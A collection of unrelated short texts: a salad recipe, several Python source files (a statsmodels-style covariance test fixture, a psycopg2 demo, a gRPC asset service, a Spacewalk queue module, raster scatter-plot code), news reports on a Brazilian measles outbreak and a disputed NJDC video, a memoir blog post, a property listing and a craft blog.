Despite the available ingredients and simpleCooking, this salad can not be called ordinary. Its highlight is a special sauce - honey-mustard. It is he who imparts a dish of sophistication and makes habitual products to play with new flavors. Lettuce leaves "Dubok" red (or green) - 200 gr. Fillet of chicken - 200 gr. Fresh tomato - 1-2 pcs. Brie cheese - 50 gr. Olive oil - 2 tbsp. L. Chicken fillet is washed and cut into several pieces, so that the meat is cooked more quickly. Cook over medium heat for 20-25 minutes, pre-pouring water. While the fillet cools, you can prepare lettuce leaves: rinse them and grind them. On a note! Leaves lettuce is better to tear with your hands, and not cut with a knife. This will preserve the airiness and volume of leaves. Wash the tomatoes in thin slices. You can use for this salad and cocktail small tomatoes. The cooled boiled fillet should be disintegrated into fibers or cut into small strips. Brie cut into small pieces with a knife or with a vegetable cutter. Mix greens, meat, tomato and cheese. On a note! Instead of tomatoes, you can use other vegetables: cucumber, sweet pepper, cauliflower. If you like sweet salads, then in the original recipe you can add canned pineapple. The foundation is ready, it remains to prepare a deliciousRefueling, because just olive oil - a bit boring, I want something interesting and new to taste. Therefore, for such a dietary salad, it is best to prepare a moderately sharp mustard-honey dressing. To prepare the sauce, mix olive oil, mustard, honey, salt and pepper. Then squeeze a little garlic and gently stir. Pour the dressing into a salad and mix thoroughly. You can also add a teaspoon of sesame seeds to decorate the dish and enhance its benefits.
import numpy as np cov_clu_stata = np.array([ .00025262993207, -.00065043385106, .20961897960949, -.00065043385106, .00721940994738, -1.2171040967615, .20961897960949, -1.2171040967615, 417.18890043724]).reshape(3,3) cov_pnw0_stata = np.array([ .00004638910396, -.00006781406833, -.00501232990882, -.00006781406833, .00238784043122, -.49683062350622, -.00501232990882, -.49683062350622, 133.97367476797]).reshape(3,3) cov_pnw1_stata = np.array([ .00007381482253, -.00009936717692, -.00613513582975, -.00009936717692, .00341979122583, -.70768252183061, -.00613513582975, -.70768252183061, 197.31345000598]).reshape(3,3) cov_pnw4_stata = np.array([ .0001305958131, -.00022910455176, .00889686530849, -.00022910455176, .00468152667913, -.88403667445531, .00889686530849, -.88403667445531, 261.76140136858]).reshape(3,3) cov_dk0_stata = np.array([ .00005883478135, -.00011241470772, -.01670183921469, -.00011241470772, .00140649264687, -.29263014921586, -.01670183921469, -.29263014921586, 99.248049966902]).reshape(3,3) cov_dk1_stata = np.array([ .00009855800275, -.00018443722054, -.03257408922788, -.00018443722054, .00205106413403, -.3943459697384, -.03257408922788, -.3943459697384, 140.50692606398]).reshape(3,3) cov_dk4_stata = np.array([ .00018052657317, -.00035661054613, -.06728261073866, -.00035661054613, .0024312795189, -.32394785247278, -.06728261073866, -.32394785247278, 148.60456447156]).reshape(3,3) class Bunch(dict): def __init__(self, **kw): dict.__init__(self, kw) self.__dict__ = self results = Bunch(cov_clu_stata=cov_clu_stata, cov_pnw0_stata=cov_pnw0_stata, cov_pnw1_stata=cov_pnw1_stata, cov_pnw4_stata=cov_pnw4_stata, cov_dk0_stata=cov_dk0_stata, cov_dk1_stata=cov_dk1_stata, cov_dk4_stata=cov_dk4_stata, )
BRASILIA (Reuters) – Brazil complained on Thursday that Venezuela was doing nothing to stop the spread of an outbreak of measles in Brazil and other neighboring countries that has been sparked by an exodus of Venezuelans fleeing economic collapse. Since February, four people – three of them Venezuelan – have died of measles in the remote Brazilian border state of Roraima where health authorities have confirmed 281 cases of the disease, mostly among children. The outbreak has prompted the Brazilian government to launch a nationwide campaign to vaccinate 11 million children, plus adults who request it. Although many Brazilian children are already vaccinated against the disease, the vaccination rate has dropped since Brazil was declared free of measles in 2016. Brazil’s Health Minister Gilberto Occhi said Venezuela had ignored Brazilian offers of assistance and vaccines and had not replied to requests for information to assess the extent of the epidemic. “We need to know what Venezuela’s policy is and what it has done to vaccinate its population, and so do other countries,” Occhi said in a conference call with foreign media. Occhi said Brazil was considering vaccinating all Venezuelans entering the country – some 2,000 people a day, with around half of those in transit or on a short-term visit. Currently only those that ask to stay as refugees or residents are vaccinated. Brazil, along with Colombia and other neighbors, has been discussing the need for Venezuela to provide up-to-date information with the Pan American Health Organization (PAHO), an official said. “All we have is preliminary data from 2017. They are not updating the information and we can’t see the magnitude of the problem,” said Carla Domingues, head of Brazil’s immunization program. PAHO said last month that nearly 2,500 confirmed cases of measles had been reported in the Americas in 2018, with over 1,600 of those occurring in Venezuela and nearly 700 in Brazil. Since Venezuelans fleeing economic and political turmoil started entering Roraima at the only land crossing three years ago, Brazil has vaccinated 45,000 arrivals. A decree by Roraima state government ordering the compulsory blanket vaccination of Venezuelans was struck down by the Supreme Court this week. Measles vaccination in Brazil fell to around 70 percent coverage in 2017, a ministry official said.
import psycopg2 # encoding=utf-8 __author__ = 'Hinsteny' def get_conn(): conn = psycopg2.connect(database="hello_db", user="hinsteny", password="welcome", host="127.0.0.1", port="5432") return conn def create_table(conn): cur = conn.cursor() cur.execute('''CREATE TABLE if not exists COMPANY (ID INT PRIMARY KEY NOT NULL, NAME TEXT NOT NULL, AGE INT NOT NULL, ADDRESS CHAR(50), SALARY REAL);''') conn.commit() conn.close() def insert_data(conn): cur = conn.cursor() # cur.execute("INSERT INTO COMPANY (ID,NAME,AGE,ADDRESS,SALARY) \ # VALUES (1, 'Paul', 32, 'California', 20000.00 )") # # cur.execute("INSERT INTO COMPANY (ID,NAME,AGE,ADDRESS,SALARY) \ # VALUES (2, 'Allen', 25, 'Texas', 15000.00 )") # # cur.execute("INSERT INTO COMPANY (ID,NAME,AGE,ADDRESS,SALARY) \ # VALUES (3, 'Teddy', 23, 'Norway', 20000.00 )") # # cur.execute("INSERT INTO COMPANY (ID,NAME,AGE,ADDRESS,SALARY) \ # VALUES (4, 'Mark', 25, 'Rich-Mond ', 65000.00 )") # conn.commit() print("Records created successfully") conn.close() def select_data(conn): ''' :param conn: :return: ''' cur = conn.cursor() cur.execute("SELECT id, name, address, salary from COMPANY ORDER BY id ASC;") rows = cur.fetchall() for row in rows: print("ID = ", row[0]) print("NAME = ", row[1]) print("ADDRESS = ", row[2]) print("SALARY = ", row[3], "\n") print("Operation done successfully") conn.close() pass def update_data(conn): cur = conn.cursor() cur.execute("UPDATE COMPANY set SALARY = 50000.00 where ID=1;") conn.commit() conn.close() select_data(get_conn()) pass def delete_data(conn): cur = conn.cursor() cur.execute("DELETE from COMPANY where ID=4;") conn.commit() conn.close() select_data(get_conn()) pass # Do test if __name__ == "__main__": create_table(get_conn()) insert_data(get_conn()) select_data(get_conn()) update_data(get_conn()) delete_data(get_conn()) pass
Again, thanks to Amy (at The World Is A Book…) for inviting me to participate the “3 Days, 3 Quotes” challenge — post a quote each day for 3 days and nominate 3 new bloggers each day to take part. At my mom’s funeral, the person who cried the loudest was one of her grandsons. Mom had taken care of 8 out of her 10 grandchildren when they were little. All my siblings and I worked fulltime, so whoever had a baby, Mom went to his or her house to help. When her grandkid grew a little older, every morning she would watch her grandkid get on the school bus, and later welcome him or her back home. She never got paid, never took a sick leave, and never complained. This entry was posted in 3 Quotes, Memoir. Bookmark the permalink. I’m reading with tears in my eyes…. Thank you for sharing the quote and story. Thanks, Amy. I didn’t think what my mom had done was so difficult until I was at her age when she took care of her first grandchild. Not to mention she had done it for 7 more later. I was happy how this photo has turned out and I learned how to post quote today. I am very happy. Thanks! What a lovely picture! Just today I was talking to a friend about the very special relationship that exists between grandparents and grandchildren. Lucky are those who get to experience it. I totally agree with you, Joanne. I have never seen my grandparents. For a long time, we (people in Taiwan) were not allowed to contact people in mainland China. When we finally did, my grandparents were passed away. Lucky are those who get to experience it — exactly! Awww – that’s really sad Helen. It must have been terrible for your grandparents too. What a beautiful photo, Helen. The intensity in your niece’s eyes as she looks at your mother….just wonderful. Excellent quote to go with your Mother’s photo. What a wonderful tribute. There’s a saying that only good Mothers can become great Grandmother. I bet your Mother is this! Thanks, Perpetua. Yes, my mom was (is) a wonderful grandmother! I remember wishing I were her grandchild. Ha. Pingback: 3 Days, 3 Quotes (Day 2) | ….on pets and prisoners….. Thank you, Dawn. I read that you had been very busy lately. I hope the busy day is over or will be over soon. Take care.
#!/usr/bin/env python import time import logging import json from concurrent import futures import grpc from grpc_ssm import opac_pb2 from grpc_health.v1 import health from grpc_health.v1 import health_pb2 from celery.result import AsyncResult from assets_manager import tasks from assets_manager import models MAX_RECEIVE_MESSAGE_LENGTH = 90 * 1024 * 1024 MAX_SEND_MESSAGE_LENGTH = 90 * 1024 * 1024 class Asset(opac_pb2.AssetServiceServicer): def add_asset(self, request, context): """ Return a task id """ task_result = tasks.add_asset.delay(request.file, request.filename, request.type, request.metadata, request.bucket) return opac_pb2.TaskId(id=task_result.id) def get_asset(self, request, context): """ Return an Asset or message erro when asset doesnt exists """ try: asset = models.Asset.objects.get(uuid=request.id) except models.Asset.DoesNotExist as e: logging.error(str(e)) context.set_details(str(e)) raise else: try: fp = open(asset.file.path, 'rb') except IOError as e: logging.error(e) context.set_details(e) raise return opac_pb2.Asset(file=fp.read(), filename=asset.filename, type=asset.type, metadata=json.dumps(asset.metadata), uuid=asset.uuid.hex, bucket=asset.bucket.name, checksum=asset.checksum, absolute_url=asset.get_absolute_url, full_absolute_url=asset.get_full_absolute_url, created_at=asset.created_at.isoformat(), updated_at=asset.updated_at.isoformat()) def update_asset(self, request, context): """ Return a task id """ task_result = tasks.update_asset.delay(request.uuid, request.file, request.filename, request.type, request.metadata, request.bucket) return opac_pb2.TaskId(id=task_result.id) def remove_asset(self, request, context): """ Return a AssetExists """ result = tasks.remove_asset(asset_uuid=request.id) return opac_pb2.AssetRemoved(exist=result) def exists_asset(self, request, context): """ Return a AssetExists """ result = tasks.exists_asset(asset_uuid=request.id) return opac_pb2.AssetExists(exist=result) def get_task_state(self, request, context): """ Return an Asset state """ res = AsyncResult(request.id) return opac_pb2.TaskState(state=res.state) def get_asset_info(self, request, context): """ Return an Asset info """ try: asset = models.Asset.objects.get(uuid=request.id) except models.Asset.DoesNotExist as e: logging.error(str(e)) context.set_details(str(e)) raise else: return opac_pb2.AssetInfo(url=asset.get_full_absolute_url, url_path=asset.get_absolute_url) def get_bucket(self, request, context): """ Return a bucket of any asset """ try: asset = models.Asset.objects.get(uuid=request.id) except models.Asset.DoesNotExist as e: logging.error(str(e)) context.set_details(str(e)) raise else: return opac_pb2.Bucket(name=asset.bucket.name) def query(self, request, context): """ Return a list of assets if it exists """ asset_list = [] assets = opac_pb2.Assets() filters = {} if request.checksum: filters['checksum'] = request.checksum if request.filename: filters['filename'] = request.filename if request.type: filters['type'] = request.type if request.uuid: filters['uuid'] = request.uuid if request.bucket: filters['bucket'] = request.bucket result = tasks.query(filters, metadata=request.metadata) for ret in result: asset = opac_pb2.Asset() asset.filename = ret.filename asset.type = ret.type asset.metadata = json.dumps(ret.metadata) asset.uuid = ret.uuid.hex asset.checksum = ret.checksum asset.bucket = ret.bucket.name asset.absolute_url = ret.get_absolute_url asset.full_absolute_url = ret.get_full_absolute_url asset.created_at = ret.created_at.isoformat() asset.updated_at = ret.updated_at.isoformat() asset_list.append(asset) assets.assets.extend(asset_list) return assets class AssetBucket(opac_pb2.BucketServiceServicer): def add_bucket(self, request, context): """ Return a task id """ task_result = tasks.add_bucket.delay(bucket_name=request.name) return opac_pb2.TaskId(id=task_result.id) def update_bucket(self, request, context): """ Return a task id """ task_result = tasks.update_bucket.delay(bucket_name=request.name, new_name=request.new_name) return opac_pb2.TaskId(id=task_result.id) def remove_bucket(self, request, context): """ Return a BucketRemoved """ result = tasks.remove_bucket(bucket_name=request.name) return opac_pb2.BucketRemoved(exist=result) def exists_bucket(self, request, context): """ Return a AssetExists """ result = tasks.exists_bucket(bucket_name=request.name) return opac_pb2.BucketExists(exist=result) def get_task_state(self, request, context): """ Return an Asset state """ res = AsyncResult(request.id) return opac_pb2.TaskState(state=res.state) def get_assets(self, request, context): """ Return a list of assets """ asset_list = [] # Necessário retornar um objeto to tipo Assets assets = opac_pb2.Assets() result = models.Asset.objects.filter(bucket__name=request.name) for ret in result: asset = opac_pb2.Asset() asset.file = ret.file.read() asset.filename = ret.filename asset.type = ret.type asset.metadata = json.dumps(ret.metadata) asset.uuid = ret.uuid.hex asset.checksum = ret.checksum asset.bucket = ret.bucket.name asset.absolute_url = ret.get_absolute_url asset.full_absolute_url = ret.get_full_absolute_url asset.created_at = ret.created_at.isoformat() asset.updated_at = ret.updated_at.isoformat() asset_list.append(asset) assets.assets.extend(asset_list) return assets def serve(host='[::]', port=5000, max_workers=4, max_receive_message_length=MAX_RECEIVE_MESSAGE_LENGTH, max_send_message_length=MAX_SEND_MESSAGE_LENGTH): servicer = health.HealthServicer() servicer.set('', health_pb2.HealthCheckResponse.SERVING) # Asset servicer.set('get_asset', health_pb2.HealthCheckResponse.SERVING) servicer.set('add_asset', health_pb2.HealthCheckResponse.SERVING) servicer.set('update_asset', health_pb2.HealthCheckResponse.SERVING) servicer.set('remove_asset', health_pb2.HealthCheckResponse.SERVING) servicer.set('exists_asset', health_pb2.HealthCheckResponse.SERVING) servicer.set('get_asset_info', health_pb2.HealthCheckResponse.SERVING) servicer.set('get_task_state', health_pb2.HealthCheckResponse.SERVING) servicer.set('get_bucket', health_pb2.HealthCheckResponse.SERVING) servicer.set('query', health_pb2.HealthCheckResponse.SERVING) # Bucket servicer.set('add_bucket', health_pb2.HealthCheckResponse.SERVING) servicer.set('update_bucket', health_pb2.HealthCheckResponse.SERVING) servicer.set('remove_bucket', health_pb2.HealthCheckResponse.SERVING) servicer.set('exists_bucket', health_pb2.HealthCheckResponse.SERVING) servicer.set('get_assets', health_pb2.HealthCheckResponse.SERVING) options = [('grpc.max_receive_message_length', max_receive_message_length), ('grpc.max_send_message_length', max_send_message_length)] server = grpc.server(futures.ThreadPoolExecutor(max_workers=max_workers), options=options) opac_pb2.add_AssetServiceServicer_to_server(Asset(), server) opac_pb2.add_BucketServiceServicer_to_server(AssetBucket(), server) # Health service health_pb2.add_HealthServicer_to_server(servicer, server) # Set port and Start Server server.add_insecure_port('{0}:{1}'.format(host, port)) server.start() logging.info('Started GRPC server on localhost, port: {0}, accept connections!'.format(port)) try: while True: time.sleep(1) except KeyboardInterrupt: logging.info('User stopping server...') server.stop(0) logging.info('Server stopped; exiting.') except Exception as e: logging.info('Caught exception "%s"; stopping server...', e) server.stop(0) logging.info('Server stopped; exiting.') if __name__ == '__main__': serve()
A source involved in the making of a disputed video that shows Israelis praising President Obama denied that the video had been selectively edited. The video, released last month by the National Jewish Democratic Council, features Israelis lauding Obama as a pro-Israel president. Many of those interviewed were residents of Sderot, a town that routinely faces rocket fire from Palestinian terrorists. "Today, we're hearing what Israelis living on the front lines think," boasted NJDC president David Harris after the video was released. However, an Israeli resident of Sderot familiar with many of those interviewed has accused the NJDC of deliberately altering the interviews. The NJDC is the current target of a $60 million defamation lawsuit for claiming that prominent Jewish philanthropist Sheldon Adelson encourages prostitution. David Farer, a denizen of Sderot, claimed recently in Pajamas Media that his neighbors’ views had been inaccurately portrayed by the NJDC, which he says "misleadingly edited or dishonestly encouraged" those being recorded. Interviewees, Farer maintains, were led to believe that they were appearing in a video thanking the United States for its support of Israel and for the Iron Dome missile defense system—not an election-year video personally thanking Obama. NJDC officials did not respond to a request for comment. However, a Jewish Democrat involved in the video’s creation told the Free Beacon that Farer is lying. "No one who was interviewed had their comments taken out of context," the source said. "All of the translations adhere to the meaning of the original Hebrew [and] all of the interview subjects knew what they were being interviewed for." Asked to clarify what exactly interviewees were told prior to recording, the source said there "was a verbal agreement that they [those on camera] were being interviewed for a video to thank President Obama." None of those captured on camera signed a release form, the source said, noting, "It was all verbal." One of the subjects of the film, Sasson Sara, is quoted saying of Obama: "Sderot is important to him. The Jewish people are important to him. The state of Israel is important to him." But Sara now claims the NJDC edited his words before and after the quote to significantly alter its meaning. The full quote, he said, should include "If" before the initial statement, and the words, "then Obama should do more about Iran" at the end. The Jewish Democrat who helped make the video denied this accusation. "It’s just not correct," the source said, referring to the entire PJ Media story, which the source deemed "absurd." "Any accusations they made about the translations of the language used in the final video is patently false," the Democrat said. "Obviously, it would be idiotic to release a video where the subtitle didn’t match up with what was being said in the video." According to Farer’s PJ Media account, many of the participants were not aware that they were appearing in a political video intended to convince pro-Israel Americans that Israelis want Obama to be re-elected. The source involved in the video’s creation said that many of those interviewed actually knew the videographer, who was formerly employed by "a world-renowned media outlet known for its impartiality." The source would not reveal exactly which media outlet he was referring to. "I spoke with somebody today and that person assured me that the interviewees were made fully aware of what the project was for—a video thanking president Obama." The NJDC scandal comes on the heels of a series of high-profile snafus for Democratic National Committee Chair Debbie Wasserman Schultz (D., Fla.), who claimed in a recent speech that the Israeli ambassador told her Republicans are "dangerous for Israel." After her words were reported, she claimed that the reporter who filed the story had "deliberately misquoted" her, a claim subsequently disproven when the reporter disclosed audio of the Wasserman Schultz speech that fully vindicated his quote. Wasserman Schultz made it clear to the Free Beacon that she would not apologize for maligning the reporter. Meanwhile, a new poll of Israelis shows that the public is deeply skeptical of the president. The survey of Jews and Arabs alike found Romney beating Obama 48 percent to 21 percent. Among voters affiliated with the conservative Likud party, Romney is winning 77 percent to 5 percent. This entry was posted in Politics and tagged Israel, Jewish Community, Obama Campaign, Sheldon Adelson, Video. Bookmark the permalink.
""" Module for taskomatic related functions (inserting into queues, etc) """ from spacewalk.server import rhnSQL class RepodataQueueEntry(object): def __init__(self, channel, client, reason, force=False, bypass_filters=False): self.channel = channel self.client = client self.reason = reason self.force = force self.bypass_filters = bypass_filters class RepodataQueue(object): def _boolean_as_char(boolean): if boolean: return 'Y' else: return 'N' _boolean_as_char = staticmethod(_boolean_as_char) def add(self, entry): h = rhnSQL.prepare(""" insert into rhnRepoRegenQueue (id, channel_label, client, reason, force, bypass_filters, next_action, created, modified) values ( sequence_nextval('rhn_repo_regen_queue_id_seq'), :channel, :client, :reason, :force, :bypass_filters, current_timestamp, current_timestamp, current_timestamp ) """) h.execute(channel=entry.channel, client=entry.client, reason=entry.reason, force=self._boolean_as_char(entry.force), bypass_filters=self._boolean_as_char(entry.bypass_filters)) def add_to_repodata_queue(channel, client, reason, force=False, bypass_filters=False): if reason == '': reason = None entry = RepodataQueueEntry(channel, client, reason, force, bypass_filters) queue = RepodataQueue() queue.add(entry) # XXX not the best place for this... def add_to_repodata_queue_for_channel_package_subscription(affected_channels, batch, caller): tmpreason = [] for package in batch: tmpreason.append(package.short_str()) reason = " ".join(tmpreason) for channel in affected_channels: # don't want to cause an error for the db add_to_repodata_queue(channel, caller, reason[:128])
Great opportunity for horse lovers, hunters, and recreational riders. The 150 +/- ridgetop acres are the standout of this listing, but it also offers a farm house that can be lived in comfortably while you customize it to your needs, or while you play or hunt on the property. Then again, you might want to select one of the many nice building sites to start a new chapter in a new home on this exceptional acreage. For horse lovers, there are several nice riding trails already established. According to the owner this property features two Native American mounds (of course, you’d want to explore that claim further). It was also once the site of the old Lively Ridge Schoolhouse. Some nice pasture with partial fencing presents many possibilities for tailoring the land to your needs. In addition to public water, there is a cistern system for garden watering. A nice combination of woodlands and fields (approximately 150 acres) and is also close to Zaleski state forest. The property also offers a great opportunity for the nature lover or the person that wants to be out and removed but yet within 30 minutes of Athens and close proximity to McArthur. Acreage 135+0r- could be bought separate.
import numpy as np from osgeo import gdal from pgeo.gis.raster import get_nodata_value import time # from pylab import hexbin,show # from scipy.ndimage import measurements # from scipy.stats import itemfreq # import rasterio from pysal.esda import mapclassify import brewer2mpl from threading import Thread # import Queue from pgeo.utils.log import logger from pgeo.error.custom_exceptions import PGeoException from scipy.optimize import curve_fit from itertools import izip from multiprocessing import Process, Manager, Lock, Queue, Pool import multiprocessing import threading from scipy.stats import linregress from os import kill log = logger("pgeo.gis.raster_scatter") # print "here" # cal= mapclassify.load_example() # print cal # ei=mapclassify.Equal_Interval(cal,k=5) # print ei def create_scatter(raster_path1, raster_path2, band1=1, band2=1, buckets=200, intervals=6, workers=3, forced_min1=0, forced_min2=0, color='Reds', color_type='Sequential', reverse=False): log.info(workers) ds1 = gdal.Open(raster_path1) ds2 = gdal.Open(raster_path2) rows1 = ds1.RasterYSize cols1 = ds1.RasterXSize rows2 = ds2.RasterYSize cols2 = ds2.RasterXSize log.info("Scatter Processing") if cols1 != cols2 or rows1 != rows2: log.error("The rasters cannot be processed because they have different dimensions") log.error("%sx%s %sx%s" % (rows1, cols1, rows2, cols2)) raise PGeoException("The rasters cannot be processed because they have different dimensions", status_code=404) band1 = ds1.GetRasterBand(band1) array1 = np.array(band1.ReadAsArray()).flatten() #array1 = np.array(band1.ReadAsArray()) nodata1 = band1.GetNoDataValue() band2 = ds2.GetRasterBand(band2) array2 = np.array(band2.ReadAsArray()).flatten() #array2 = np.array(band2.ReadAsArray()) nodata2 = band2.GetNoDataValue() # min/max calulation (min1, max1) = band1.ComputeRasterMinMax(0) step1 = (max1 - min1) / buckets (min2, max2) = band2.ComputeRasterMinMax(0) step2 = (max2 - min2) / buckets # Calculation of the frequencies #freqs = couples_with_freq(array1, array2, step1, step2, min1, min2, max1, max2, forced_min1, forced_min2, nodata1, nodata2) #freqs = couples_with_freq_split(array1, array2, step1, step2, min1, min2, max1, max2, forced_min1, forced_min2, nodata1, nodata2) statistics = couples_with_freq_multiprocess(array1, array2, step1, step2, min1, min2, max1, max2, forced_min1, forced_min2, nodata1, nodata2, workers) #print len(freqs) series = get_series(statistics["scatter"].values(), intervals, color, color_type, reverse) #print series result = dict() # probably not useful for the chart itself # result['min1'] = min1, # result['min2'] = min2, # result['max2'] = max2, # result['step1'] = step1, # result['step2'] = step2 result["series"] = series result["stats"] = statistics["stats"] # is it useful to remove them fro the memory? del ds1 del ds2 del array1 del array2 return result # def worker(arr1, arr2, step1, step2, out_q): # d = dict() # for item_a, item_b in izip(arr1, arr2): # value1 = round(item_a / step1, 0) # value2 = round(item_b / step2, 0) # # print step1, step2 # # print value1, value2 # # key = str(value1) + "_" + str(value2) # # print key # # print item_a, item_b # # # #break # key = str(value1) + "_" + str(value2) # try: # d[key]["freq"] += 1 # except: # d[key] = { # "data": [item_a, item_b], # "freq": 1 # } # print "worker end" # out_q.put(d) # out_q.close() def worker(arr1, arr2, step1, step2, out_q): d = dict() try: # TODO: move it from here: calculation of the regression coeffient # TODO: add a boolean to check if it's need the computation of the coeffifcients slope, intercept, r_value, p_value, std_err = linregress(arr1, arr2) d["stats"] = { "slope": slope, "intercept": intercept, "r_value": r_value, "p_value": p_value, "std_err": std_err } d["scatter"] = {} heatmap, xedges, yedges = np.histogram2d(arr1, arr2, bins=200) for x in range(0, len(xedges)-1): for y in range(0, len(yedges)-1): if heatmap[x][y] > 0: d["scatter"][str(xedges[x]) + "_" + str(yedges[y])] = { "data": [xedges[x], yedges[y]], "freq": heatmap[x][y] } log.info("worker end") out_q.put(d) out_q.close() except PGeoException, e: log.error(e.get_message()) raise PGeoException(e.get_message(), e.get_status_code()) def couples_with_freq_multiprocess(array1, array2, step1, step2, min1, min2, max1, max2, forced_min1, forced_min2, nodata1=None, nodata2=None, workers=3, rounding=0): print "couples_with_freq_multiprocess" start_time = time.time() index1 = (array1 > forced_min1) & (array1 <= max1) & (array1 != nodata1) index2 = (array2 > forced_min2) & (array2 <= max2) & (array2 != nodata2) # merge array indexes compound_index = index1 & index2 del index1 del index2 # it creates two arrays from the two original arrays arr1 = array1[compound_index] arr2 = array2[compound_index] print "creates two arrays from the two original arrays" del array1 del array2 length_interval = len(arr1)/workers length_end = length_interval length_start = 0 out_q = Queue() procs = [] for x in range(0, len(arr1), length_interval): a1 = arr1[length_start:length_end] a2 = arr2[length_start:length_end] p = multiprocessing.Process(target=worker, args=(a1, a2, step1, step2, out_q)) procs.append(p) p.start() length_start = x + length_interval length_end = length_end + length_interval # is it useful? del arr1 del arr2 resultdict = [] for i in range(workers): resultdict.append(out_q.get()) # check if the process was mono core log.info("Workers %s ", workers) if workers <= 1: log.info("Computation done in %s seconds ---" % str(time.time() - start_time)) for p in procs: p.join() log.info("Computation done in %s seconds ---" % str(time.time() - start_time)) return resultdict[0] else: log.info("Merging dictionaries") # merge ditionaries final_dict = dict() for d in resultdict: for key, value in d.iteritems(): try: final_dict[key]["freq"] += d[key]["freq"] except: final_dict[key] = d[key] #log.info(final_dict) log.info("Computation done in %s seconds ---" % str(time.time() - start_time)) for p in procs: print "-----------" p.terminate() try: # TODO: check the side effects of that workaround kill(p.pid, 9) except: pass print p, p.is_alive() log.info("Computation done in %s seconds ---" % str(time.time() - start_time)) return final_dict class SummingThread(threading.Thread): def __init__(self, array1, array2, step1, step2): super(SummingThread, self).__init__() self.array1=array1 self.array2=array2 self.step1=step1 self.step2=step2 def run(self): self.d = dict() log.info("lenght of: %s" , len(self.array1)) for item_a, item_b in izip(self.array1, self.array2): value1 = round(item_a / self.step1, 2) value2 = round(item_b / self.step2, 2) key = str(value1) + "_" + str(value2) try: self.d[key]["freq"] += 1 except: self.d[key] = { "data": [item_a, item_b], "freq": 1 } def couples_with_freq_slow(array1, array2, step1, step2, min1, min2, max1, max2, rows, cols, buckets, nodata=None): d = dict() print "couples_with_freq" for i in range(0, len(array1)): if array1[i] > min1 and array2[i] > min2: value1 = str(int(array1[i] / step1)) value2 = str(int(array2[i] / step2)) # key value key = str(value1 + "_" + value2) # TODO this should be a rounding, otherwise the last one wins value = [array1[i], array2[i]] freq = 1 if key in d: freq = d[key]["freq"] + 1 d[key] = { "data": value, "freq": freq } return d def couples_with_freq_split(array1, array2, step1, step2, min1, min2, max1, max2, forced_min1, forced_min2, nodata1=None, nodata2=None, rounding=0): # TODO: the rounding should be calculated by the step interval probably log.info("Calculating frequencies") start_time = time.time() d = dict() index1 = (array1 > forced_min1) & (array1 <= max1) & (array1 != nodata1) index2 = (array2 > forced_min2) & (array2 <= max2) & (array2 != nodata2) # merge array indexes compound_index = index1 & index2 # it creates two arrays from the two original arrays arr1 = array1[compound_index] arr2 = array2[compound_index] for item_a, item_b in izip(arr1, arr2): value1 = round(item_a / step1, 0) value2 = round(item_b / step2, 0) key = str(value1) + "_" + str(value2) try: d[key]["freq"] += 1 except: d[key] = { "data": [item_a, item_b], "freq": 1 } log.info("Computation done in %s seconds ---" % str(time.time() - start_time)) print len(d) return d def couples_with_freq(array1, array2, step1, step2, min1, min2, max1, max2, forced_min1, forced_min2, nodata1=None, nodata2=None, rounding=0): ''' It uses instead of the other one a boolean filter that is slightly faster than the where condition :param array1: :param array2: :param step1: :param step2: :param min1: :param min2: :param max1: :param max2: :param forced_min1: :param forced_min2: :param nodata1: :param nodata2: :param rounding: :return: ''' # TODO: the rounding should be calculated by the step interval probably log.info("Calculating frequencies") start_time = time.time() d = dict() index1 = (array1 > forced_min1) & (array1 <= max1) & (array1 != nodata1) index2 = (array2 > forced_min2) & (array2 <= max2) & (array2 != nodata2) # merge array indexes compound_index = index1 & index2 # it creates two arrays from the two original arrays arr1 = array1[compound_index] arr2 = array2[compound_index] for item_a, item_b in izip(arr1, arr2): value1 = round(item_a / step1, 0) value2 = round(item_b / step2, 0) key = str(value1) + "_" + str(value2) try: d[key]["freq"] += 1 except: d[key] = { "data": [item_a, item_b], "freq": 1 } log.info("Computation done in %s seconds ---" % str(time.time() - start_time)) print len(d) return d def couples_with_freq_old(array1, array2, step1, step2, min1, min2, max1, max2, forced_min1, forced_min2, nodata1=None, nodata2=None, rounding=0): # TODO: the rounding should be calculated by the step interval probably log.info("Calculating frequencies") start_time = time.time() d = dict() for i in np.where((array1 > forced_min1) & (array1 <= max1) & (array1 != nodata1)): for j in np.where((array2 > forced_min2) & (array2 <= max2) & (array2 != nodata2)): #print len(numpy.intersect1d(i, j)) for index in np.intersect1d(i, j): val1 = array1[index] val2 = array2[index] #value1 = str(round(float(array1[index] / step1), 0)) #value2 = str(round(float(array2[index] / step2), 0)) value1 = int(val1 / step1) value2 = int(val2 / step2) key = str(value1) + "_" + str(value2) # if key in d: # d[key]["freq"] += 1 # else: # d[key] = { # "data": [value1, value2], # "freq": 1 # } try: d[key]["freq"] += 1 except: d[key] = { "data": [val1, val2], "freq": 1 } # for v in d.values(): # print v log.info("Computation done in %s seconds ---" % str(time.time() - start_time)) print len(d) return d # TODO: move it def classify_values(values, k=5, classification_type="Jenks_Caspall"): # TODO use a "switch" between the variuos classification types (move to a classification file python file instead of here) start_time = time.time() #result = mapclassify.quantile(values, k) #print values #start_time = time.time() array = np.array(values) result = mapclassify.Jenks_Caspall_Forced(array, k) log.info("Classification done in %s seconds ---" % str(time.time() - start_time)) #return result return result.bins def get_series(values, intervals, color, color_type, reverse=False): classification_values = [] for v in values: classification_values.append(float(v['freq'])) classes = classify_values(classification_values, intervals) #bmap = brewer2mpl.get_map('RdYlGn', 'Diverging', 9, reverse=True) bmap = brewer2mpl.get_map(color, color_type, intervals+1, reverse=reverse) colors = bmap.hex_colors # creating series series = [] for color in colors: #print color series.append({ "color": color, "data" : [] }) #print classes for v in values: freq = v['freq'] for i in range(len(classes)): if freq <= classes[i]: series[i]['data'].append([float(v['data'][0]), float(v['data'][1])]) break return series
I was finding it difficult to come up with new ideas for some cards and even after flicking through some old magazines and books I still couldn’t come up with any thing. But I then started to look back at some previous cards I have made I got an idea from 2 previous designs that I joined together. This is made using the watercolour technique and stamps where you ink up your stamp and spritz the stamp with water before stamping onto water colour paper. The September ATC swap theme for ukstampers is ‘watercolour’ so I have used Oriental watercolours as my inspiration for my 3 swaps. I have used various sprays and a variety of techniques to make the background papers using leaves as masks and also masking paper.
